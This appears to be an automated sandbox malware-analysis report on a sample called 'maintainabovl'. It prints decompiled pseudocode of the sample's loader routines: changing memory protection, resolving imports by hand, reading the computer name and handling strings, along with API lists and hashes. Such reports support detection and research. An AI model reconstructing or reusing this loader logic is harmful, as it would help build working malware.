                                                      • Part of subcall function 01094881: lstrlen.KERNEL32(?,00000000,01B09DD8,00000000,0109166A,01B09FFB,69B25F44,?,?,?,?,69B25F44,00000005,0109A00C,4D283A53,?), ref: 01094888
                                                      • Part of subcall function 01094881: mbstowcs.NTDLL ref: 010948B1
                                                      • Part of subcall function 01094881: memset.NTDLL ref: 010948C3
                                                    • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,01B093CC), ref: 010913A6
                                                    • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,01B093CC), ref: 010913D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                    • String ID: Uqt
                                                    • API String ID: 1500278894-2320327147
                                                    • Opcode ID: aaec94ddd6559d493ff0042477cd54d22d5b643fad5062c311129f29b063875e
                                                    • Instruction ID: cfd1edd3f5047d817981f85ea2e92000f8639cf3c83937f081454ccb4634f6ee
                                                    • Opcode Fuzzy Hash: aaec94ddd6559d493ff0042477cd54d22d5b643fad5062c311129f29b063875e
                                                    • Instruction Fuzzy Hash: 6401843571020ABBDF215F69DC54E9F3BB9FF84714F008029FA809A1A0DAB2D955DB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E00401A88(void* __eax, void* _a4) {
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				long _v20;
                                                    				int _t43;
                                                    				long _t54;
                                                    				signed int _t57;
                                                    				void* _t58;
                                                    				signed int _t60;
                                                    
                                                    				_v12 = _v12 & 0x00000000;
                                                    				_t57 =  *0x403180;
                                                    				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                    				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                    				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                                                    				_v8 = _v8 & 0x00000000;
                                                    				if(_v16 <= 0) {
                                                    					L12:
                                                    					return _v12;
                                                    				} else {
                                                    					goto L1;
                                                    				}
                                                    				while(1) {
                                                    					L1:
                                                    					_t60 = _v12;
                                                    					if(_t60 != 0) {
                                                    						goto L12;
                                                    					}
                                                    					asm("bt [esi+0x24], eax");
                                                    					if(_t60 >= 0) {
                                                    						asm("bt [esi+0x24], eax");
                                                    						if(__eflags >= 0) {
                                                    							L8:
                                                    							_t54 = _t57 - 0x69b25f40;
                                                    							L9:
                                                    							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                    							if(_t43 == 0) {
                                                    								_v12 = GetLastError();
                                                    							}
                                                    							_v8 = _v8 + 1;
                                                    							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                                                    							if(_v8 < _v16) {
                                                    								continue;
                                                    							} else {
                                                    								goto L12;
                                                    							}
                                                    						}
                                                    						asm("bt [esi+0x24], eax");
                                                    						_t54 = _t57 - 0x69b25f42;
                                                    						if(__eflags >= 0) {
                                                    							goto L9;
                                                    						}
                                                    						goto L8;
                                                    					}
                                                    					asm("bt [esi+0x24], eax");
                                                    					if(_t60 >= 0) {
                                                    						_t54 = _t57 - 0x69b25f24;
                                                    					} else {
                                                    						_t54 = _t57 - 0x69b25f04;
                                                    					}
                                                    					goto L9;
                                                    				}
                                                    				goto L12;
                                                    			}

                                                    APIs
                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401AC1
                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401B36
                                                    • GetLastError.KERNEL32 ref: 00401B3C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ProtectVirtual$ErrorLast
                                                    • String ID:
                                                    • API String ID: 1469625949-0
                                                    • Opcode ID: 651d8e0ddf3ca5bf17853d60118bc462648b44d6942099e56a14baf6d27ff26b
                                                    • Instruction ID: f32d11d6171dd66a2aa87c7aaa419f9d8d469986a815ac39be6b4f505c02cff5
                                                    • Opcode Fuzzy Hash: 651d8e0ddf3ca5bf17853d60118bc462648b44d6942099e56a14baf6d27ff26b
                                                    • Instruction Fuzzy Hash: 7A214D71800309DFCB14CF95C9859BAF7B4FB18345F0144AAD602E7164E7B8BA68CB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 47%
                                                    			E01093297(char* _a4, char** _a8) {
                                                    				char* _t7;
                                                    				char* _t11;
                                                    				char* _t14;
                                                    				char* _t16;
                                                    				char* _t17;
                                                    				char _t18;
                                                    				signed int _t20;
                                                    				signed int _t22;
                                                    
                                                    				_t16 = _a4;
                                                    				_push(0x20);
                                                    				_t20 = 1;
                                                    				_push(_t16);
                                                    				while(1) {
                                                    					_t7 = StrChrA();
                                                    					if(_t7 == 0) {
                                                    						break;
                                                    					}
                                                    					_t20 = _t20 + 1;
                                                    					_push(0x20);
                                                    					_push( &(_t7[1]));
                                                    				}
                                                    				_t11 = E01096A51(_t20 << 2);
                                                    				_a4 = _t11;
                                                    				if(_t11 != 0) {
                                                    					StrTrimA(_t16, 0x1099278); // executed
                                                    					_t22 = 0;
                                                    					do {
                                                    						_t14 = StrChrA(_t16, 0x20);
                                                    						if(_t14 != 0) {
                                                    							 *_t14 = 0;
                                                    							do {
                                                    								_t14 =  &(_t14[1]);
                                                    								_t18 =  *_t14;
                                                    							} while (_t18 == 0x20 || _t18 == 9);
                                                    						}
                                                    						_t17 = _a4;
                                                    						 *(_t17 + _t22 * 4) = _t16;
                                                    						_t22 = _t22 + 1;
                                                    						_t16 = _t14;
                                                    					} while (_t14 != 0);
                                                    					 *_a8 = _t17;
                                                    				}
                                                    				return 0;
                                                    			}

                                                    APIs
                                                    • StrChrA.SHLWAPI(?,00000020,00000000,01B095FC,?,?,01094658,?,01B095FC), ref: 010932B3
                                                    • StrTrimA.KERNELBASE(?,01099278,00000002,?,01094658,?,01B095FC), ref: 010932D1
                                                    • StrChrA.SHLWAPI(?,00000020,?,01094658,?,01B095FC), ref: 010932DC
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Trim
                                                    • String ID:
                                                    • API String ID: 3043112668-0
                                                    • Opcode ID: 721424e48baba843b71e8d80fb8c27cd124973d2830e3f33c9179f4210084ce0
                                                    • Instruction ID: fca7e7b53b124209eecaa8e02120f48806f30f4b77a1e4afcbb007d23a95f3fa
                                                    • Opcode Fuzzy Hash: 721424e48baba843b71e8d80fb8c27cd124973d2830e3f33c9179f4210084ce0
                                                    • Instruction Fuzzy Hash: EA01B171304356AFEB204A7A8C69F677FDDFB85340F144092BAD6CF282DA30C841DA60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0109692B(void* _a4) {
                                                    				char _t2;
                                                    
                                                    				_t2 = RtlFreeHeap( *0x109a2d8, 0, _a4); // executed
                                                    				return _t2;
                                                    			}

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: Uqt
                                                    • API String ID: 3298025750-2320327147
                                                    • Opcode ID: bb7dba6257ff95ec7369ec97144fbc0ff9c0c1be99ed49d7c58e690be6435dfb
                                                    • Instruction ID: ffaa831a8bceecbf89d34d94d1a410efc516af79a4143cdc57f603860814c317
                                                    • Opcode Fuzzy Hash: bb7dba6257ff95ec7369ec97144fbc0ff9c0c1be99ed49d7c58e690be6435dfb
                                                    • Instruction Fuzzy Hash: F9B01271204200EFCB314B00DE14F057A21B794700F004014B384000B882370420FB15
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E01092E7B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                    				void* _v8;
                                                    				void* __esi;
                                                    				intOrPtr* _t35;
                                                    				void* _t40;
                                                    				intOrPtr* _t41;
                                                    				intOrPtr* _t43;
                                                    				intOrPtr* _t45;
                                                    				intOrPtr* _t50;
                                                    				intOrPtr* _t52;
                                                    				void* _t54;
                                                    				intOrPtr* _t55;
                                                    				intOrPtr* _t57;
                                                    				intOrPtr* _t61;
                                                    				intOrPtr* _t65;
                                                    				intOrPtr _t68;
                                                    				void* _t72;
                                                    				void* _t75;
                                                    				void* _t76;
                                                    
                                                    				_t55 = _a4;
                                                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                    				_a4 = 0;
                                                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                    				if(_t76 < 0) {
                                                    					L18:
                                                    					return _t76;
                                                    				}
                                                    				_t40 = E010950B7(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                    				_t76 = _t40;
                                                    				if(_t76 >= 0) {
                                                    					_t61 = _a28;
                                                    					if(_t61 != 0 &&  *_t61 != 0) {
                                                    						_t52 = _v8;
                                                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                    					}
                                                    					if(_t76 >= 0) {
                                                    						_t43 =  *_t55;
                                                    						_t68 =  *0x109a348; // 0xa6d5a8
                                                    						_t20 = _t68 + 0x109b1fc; // 0x740053
                                                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                    						if(_t76 >= 0) {
                                                    							_t76 = E010961E8(_a4);
                                                    							if(_t76 >= 0) {
                                                    								_t65 = _a28;
                                                    								if(_t65 != 0 &&  *_t65 == 0) {
                                                    									_t50 = _a4;
                                                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                    								}
                                                    							}
                                                    						}
                                                    						_t45 = _a4;
                                                    						if(_t45 != 0) {
                                                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                    						}
                                                    						_t57 = __imp__#6;
                                                    						if(_a20 != 0) {
                                                    							 *_t57(_a20);
                                                    						}
                                                    						if(_a12 != 0) {
                                                    							 *_t57(_a12);
                                                    						}
                                                    					}
                                                    				}
                                                    				_t41 = _v8;
                                                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                    				goto L18;
                                                    			}

                                                    APIs
                                                      • Part of subcall function 010950B7: SysAllocString.OLEAUT32(80000002), ref: 01095114
                                                      • Part of subcall function 010950B7: SysFreeString.OLEAUT32(00000000), ref: 0109517A
                                                    • SysFreeString.OLEAUT32(?), ref: 01092F5A
                                                    • SysFreeString.OLEAUT32(010920DA), ref: 01092F64
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: String$Free$Alloc
                                                    • String ID:
                                                    • API String ID: 986138563-0
                                                    • Opcode ID: 5621c49fc9dba1aaff7141611ae8dcdd3868a0833f6a3a1e52d7e11ba17f07b8
                                                    • Instruction ID: 96e168a20daffbec58a45c78b3d3e5349c235e33ef98c79c428b2201fdce752c
                                                    • Opcode Fuzzy Hash: 5621c49fc9dba1aaff7141611ae8dcdd3868a0833f6a3a1e52d7e11ba17f07b8
                                                    • Instruction Fuzzy Hash: 9E313772500119BFCF21EF58CCA8C9BBBBAFBC974071446A8F9469B214D7329D51DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0040171E(void* __edi, intOrPtr _a4) {
                                                    				signed int _v8;
                                                    				intOrPtr* _v12;
                                                    				_Unknown_base(*)()** _v16;
                                                    				signed int _v20;
                                                    				signed short _v24;
                                                    				struct HINSTANCE__* _v28;
                                                    				intOrPtr _t43;
                                                    				intOrPtr* _t45;
                                                    				intOrPtr _t46;
                                                    				struct HINSTANCE__* _t47;
                                                    				intOrPtr* _t49;
                                                    				intOrPtr _t50;
                                                    				signed short _t51;
                                                    				_Unknown_base(*)()* _t53;
                                                    				CHAR* _t54;
                                                    				_Unknown_base(*)()* _t55;
                                                    				void* _t58;
                                                    				signed int _t59;
                                                    				_Unknown_base(*)()* _t60;
                                                    				intOrPtr _t61;
                                                    				intOrPtr _t65;
                                                    				signed int _t68;
                                                    				void* _t69;
                                                    				CHAR* _t71;
                                                    				signed short* _t73;
                                                    
                                                    				_t69 = __edi;
                                                    				_v20 = _v20 & 0x00000000;
                                                    				_t59 =  *0x403180;
                                                    				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                                    				if(_t43 != 0) {
                                                    					_t45 = _t43 + __edi;
                                                    					_v12 = _t45;
                                                    					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                    					if(_t46 != 0) {
                                                    						while(1) {
                                                    							_t71 = _t46 + _t69;
                                                    							_t47 = LoadLibraryA(_t71); // executed
                                                    							_v28 = _t47;
                                                    							if(_t47 == 0) {
                                                    								break;
                                                    							}
                                                    							_v24 = _v24 & 0x00000000;
                                                    							 *_t71 = _t59 - 0x69b25f44;
                                                    							_t49 = _v12;
                                                    							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                    							_t50 =  *_t49;
                                                    							if(_t50 != 0) {
                                                    								L6:
                                                    								_t73 = _t50 + _t69;
                                                    								_v16 = _t61 + _t69;
                                                    								while(1) {
                                                    									_t51 =  *_t73;
                                                    									if(_t51 == 0) {
                                                    										break;
                                                    									}
                                                    									if(__eflags < 0) {
                                                    										__eflags = _t51 - _t69;
                                                    										if(_t51 < _t69) {
                                                    											L12:
                                                    											_t21 =  &_v8;
                                                    											 *_t21 = _v8 & 0x00000000;
                                                    											__eflags =  *_t21;
                                                    											_v24 =  *_t73 & 0x0000ffff;
                                                    										} else {
                                                    											_t65 = _a4;
                                                    											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                    											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                    												goto L12;
                                                    											} else {
                                                    												goto L11;
                                                    											}
                                                    										}
                                                    									} else {
                                                    										_t51 = _t51 + _t69;
                                                    										L11:
                                                    										_v8 = _t51;
                                                    									}
                                                    									_t53 = _v8;
                                                    									__eflags = _t53;
                                                    									if(_t53 == 0) {
                                                    										_t54 = _v24 & 0x0000ffff;
                                                    									} else {
                                                    										_t54 = _t53 + 2;
                                                    									}
                                                    									_t55 = GetProcAddress(_v28, _t54);
                                                    									__eflags = _t55;
                                                    									if(__eflags == 0) {
                                                    										_v20 = _t59 - 0x69b25ec5;
                                                    									} else {
                                                    										_t68 = _v8;
                                                    										__eflags = _t68;
                                                    										if(_t68 != 0) {
                                                    											 *_t68 = _t59 - 0x69b25f44;
                                                    										}
                                                    										 *_v16 = _t55;
                                                    										_t58 = 0x593682f4 + _t59 * 4;
                                                    										_t73 = _t73 + _t58;
                                                    										_t32 =  &_v16;
                                                    										 *_t32 = _v16 + _t58;
                                                    										__eflags =  *_t32;
                                                    										continue;
                                                    									}
                                                    									goto L23;
                                                    								}
                                                    							} else {
                                                    								_t50 = _t61;
                                                    								if(_t61 != 0) {
                                                    									goto L6;
                                                    								}
                                                    							}
                                                    							L23:
                                                    							_v12 = _v12 + 0x14;
                                                    							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                    							if(_t46 != 0) {
                                                    								continue;
                                                    							} else {
                                                    							}
                                                    							L26:
                                                    							goto L27;
                                                    						}
                                                    						_t60 = _t59 + 0x964da13a;
                                                    						__eflags = _t60;
                                                    						_v20 = _t60;
                                                    						goto L26;
                                                    					}
                                                    				}
                                                    				L27:
                                                    				return _v20;
                                                    			}

                                                    0x0040171e
                                                    0x00401727
                                                    0x0040172c
                                                    0x00401732
                                                    0x0040173b
                                                    0x00401741
                                                    0x00401743
                                                    0x00401746
                                                    0x0040174b
                                                    0x00401752
                                                    0x00401752
                                                    0x00401756
                                                    0x0040175c
                                                    0x00401761
                                                    0x00000000
                                                    0x00000000
                                                    0x00401767
                                                    0x00401771
                                                    0x00401773
                                                    0x00401776
                                                    0x00401779
                                                    0x0040177d
                                                    0x00401785
                                                    0x00401787
                                                    0x0040178a
                                                    0x004017f2
                                                    0x004017f2
                                                    0x004017f6
                                                    0x00000000
                                                    0x00000000
                                                    0x0040178f
                                                    0x00401795
                                                    0x00401797
                                                    0x004017aa
                                                    0x004017ad
                                                    0x004017ad
                                                    0x004017ad
                                                    0x004017b1
                                                    0x00401799
                                                    0x00401799
                                                    0x004017a1
                                                    0x004017a3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004017a3
                                                    0x00401791
                                                    0x00401791
                                                    0x004017a5
                                                    0x004017a5
                                                    0x004017a5
                                                    0x004017b4
                                                    0x004017b7
                                                    0x004017b9
                                                    0x004017c0
                                                    0x004017bb
                                                    0x004017bb
                                                    0x004017bb
                                                    0x004017c8
                                                    0x004017ce
                                                    0x004017d0
                                                    0x00401800
                                                    0x004017d2
                                                    0x004017d2
                                                    0x004017d5
                                                    0x004017d7
                                                    0x004017df
                                                    0x004017df
                                                    0x004017e4
                                                    0x004017e6
                                                    0x004017ed
                                                    0x004017ef
                                                    0x004017ef
                                                    0x004017ef
                                                    0x00000000
                                                    0x004017ef
                                                    0x00000000
                                                    0x004017d0
                                                    0x0040177f
                                                    0x0040177f
                                                    0x00401783
                                                    0x00000000
                                                    0x00000000
                                                    0x00401783
                                                    0x00401803
                                                    0x00401803
                                                    0x0040180a
                                                    0x0040180f
                                                    0x00000000
                                                    0x00000000
                                                    0x00401815
                                                    0x00401820
                                                    0x00000000
                                                    0x00401820
                                                    0x00401817
                                                    0x00401817
                                                    0x0040181d
                                                    0x00000000
                                                    0x0040181d
                                                    0x0040174b
                                                    0x00401821
                                                    0x00401826

                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401756
                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004017C8
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID:
                                                    • API String ID: 2574300362-0
                                                    • Opcode ID: 71bd3608c2aae27e145e5c381a93ddbc10b6f85558300da18975cc676a848597
                                                    • Instruction ID: 99a84c3d3c52fc79e8e01ccc32a65c1a183593383b808a84fef0d53d2d0e1083
                                                    • Opcode Fuzzy Hash: 71bd3608c2aae27e145e5c381a93ddbc10b6f85558300da18975cc676a848597
                                                    • Instruction Fuzzy Hash: DF311A75A00206DFDB15CF59C994AAEB7F4FF44311B24407AD801EB3A0E778DA41CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00401E51() {
                                                    				char _v16;
                                                    				intOrPtr _v28;
                                                    				void _v32;
                                                    				void* _v36;
                                                    				intOrPtr _t15;
                                                    				void* _t16;
                                                    				void* _t24;
                                                    				long _t25;
                                                    				int _t26;
                                                    				void* _t30;
                                                    				intOrPtr* _t32;
                                                    				signed int _t36;
                                                    				intOrPtr _t39;
                                                    
                                                    				_t15 =  *0x403184;
                                                    				if( *0x40316c > 5) {
                                                    					_t16 = _t15 + 0x4040f9;
                                                    				} else {
                                                    					_t16 = _t15 + 0x4040b1;
                                                    				}
                                                    				E00401876(_t16, _t16);
                                                    				_t36 = 6;
                                                    				memset( &_v32, 0, _t36 << 2);
                                                    				_t24 = E00401C32( &_v32,  &_v16,  *0x403180 ^ 0xf7a71548); // executed
                                                    				if(_t24 == 0) {
                                                    					_t25 = 0xb;
                                                    				} else {
                                                    					_t26 = lstrlenW( *0x403178);
                                                    					_t8 = _t26 + 2; // 0x2
                                                    					_t11 = _t26 + _t8 + 8; // 0xa
                                                    					_t30 = E0040189C(_t39, _t11,  &_v32,  &_v36); // executed
                                                    					if(_t30 == 0) {
                                                    						_t40 =  *0x403178;
                                                    						_t32 = _v36;
                                                    						 *_t32 = 0;
                                                    						if( *0x403178 == 0) {
                                                    							 *((short*)(_t32 + 4)) = 0;
                                                    						} else {
                                                    							E00401F20(_t45, _t40, _t32 + 4);
                                                    						}
                                                    					}
                                                    					_t25 = E004014DF(_v28); // executed
                                                    				}
                                                    				ExitThread(_t25);
                                                    			}

                                                    0x00401e57
                                                    0x00401e68
                                                    0x00401e72
                                                    0x00401e6a
                                                    0x00401e6a
                                                    0x00401e6a
                                                    0x00401e79
                                                    0x00401e82
                                                    0x00401e87
                                                    0x00401e9e
                                                    0x00401ea5
                                                    0x00401f02
                                                    0x00401ea7
                                                    0x00401ead
                                                    0x00401eb3
                                                    0x00401ec1
                                                    0x00401ec5
                                                    0x00401ecc
                                                    0x00401ece
                                                    0x00401ed4
                                                    0x00401ed8
                                                    0x00401ee0
                                                    0x00401ef1
                                                    0x00401ee2
                                                    0x00401ee8
                                                    0x00401ee8
                                                    0x00401ee0
                                                    0x00401ef9
                                                    0x00401ef9
                                                    0x00401f04

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitThreadlstrlen
                                                    • String ID:
                                                    • API String ID: 2636182767-0
                                                    • Opcode ID: 0322cd87ada09ea54292c2fad7f3718e47c545a75c6519401737e8030c44b873
                                                    • Instruction ID: eac9e3a36576fb8f380d495d46173dcf8ce949717d93710fe5cc7838fdad819d
                                                    • Opcode Fuzzy Hash: 0322cd87ada09ea54292c2fad7f3718e47c545a75c6519401737e8030c44b873
                                                    • Instruction Fuzzy Hash: E211D072508205AAE711DF65CD09E5B77ECAB48304F04483BBA05F71B0EB34EA098B9E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E01096A66(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                                    				void* _t21;
                                                    				void* _t22;
                                                    				signed int _t24;
                                                    				intOrPtr* _t26;
                                                    				void* _t27;
                                                    
                                                    				_t26 = __edi;
                                                    				if(_a4 == 0) {
                                                    					L2:
                                                    					_t27 = E010954A0(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                    					if(_t27 == 0) {
                                                    						_t24 = _a12 >> 1;
                                                    						if(_t24 == 0) {
                                                    							_t27 = 2;
                                                    							HeapFree( *0x109a2d8, 0, _a4);
                                                    						} else {
                                                    							_t21 = _a4;
                                                    							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                                    							 *_t26 = _t21;
                                                    						}
                                                    					}
                                                    					L6:
                                                    					return _t27;
                                                    				}
                                                    				_t22 = E01093D20(_a4, _a8, _a12, __edi); // executed
                                                    				_t27 = _t22;
                                                    				if(_t27 == 0) {
                                                    					goto L6;
                                                    				}
                                                    				goto L2;
                                                    			}

                                                    APIs
                                                      • Part of subcall function 01093D20: SysFreeString.OLEAUT32(00000000), ref: 01093D83
                                                    • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7476F710,?,00000000,?,00000000,?,01095EA6,?,004F0053,01B093D8,00000000,?), ref: 01096AC9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Free$HeapString
                                                    • String ID: Uqt
                                                    • API String ID: 3806048269-2320327147
                                                    • Opcode ID: c481739f61ceb3823e5ba558576988943efef2304a6654b59e35fb0381592ae0
                                                    • Instruction ID: 4d1974968a04da10742b0b551641447ada1179b0c6ee597bafc7bbaf920807ee
                                                    • Opcode Fuzzy Hash: c481739f61ceb3823e5ba558576988943efef2304a6654b59e35fb0381592ae0
                                                    • Instruction Fuzzy Hash: CA012C32100519BBDF229F59CC20EDA3BA5EF44750F04C024FE499A120D7368960EBD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 37%
                                                    			E0109131C(void* __ecx) {
                                                    				signed int _v8;
                                                    				void* _t15;
                                                    				void* _t19;
                                                    				void* _t20;
                                                    				void* _t22;
                                                    				intOrPtr* _t23;
                                                    
                                                    				_t23 = __imp__;
                                                    				_t20 = 0;
                                                    				_v8 = _v8 & 0;
                                                    				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                    				_t10 = _v8;
                                                    				if(_v8 != 0) {
                                                    					_t20 = E01096A51(_t10 + 1);
                                                    					if(_t20 != 0) {
                                                    						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                    						if(_t15 != 0) {
                                                    							 *((char*)(_v8 + _t20)) = 0;
                                                    						} else {
                                                    							E0109692B(_t20);
                                                    							_t20 = 0;
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t20;
                                                    			}

                                                    APIs
                                                    • GetComputerNameExA.KERNELBASE(00000003,00000000,0109374D,00000000,00000000,?,775EC740,0109374D), ref: 01091334
                                                      • Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D
                                                    • GetComputerNameExA.KERNELBASE(00000003,00000000,0109374D,0109374E,?,775EC740,0109374D), ref: 01091351
                                                      • Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937
                                                    Memory Dump Source
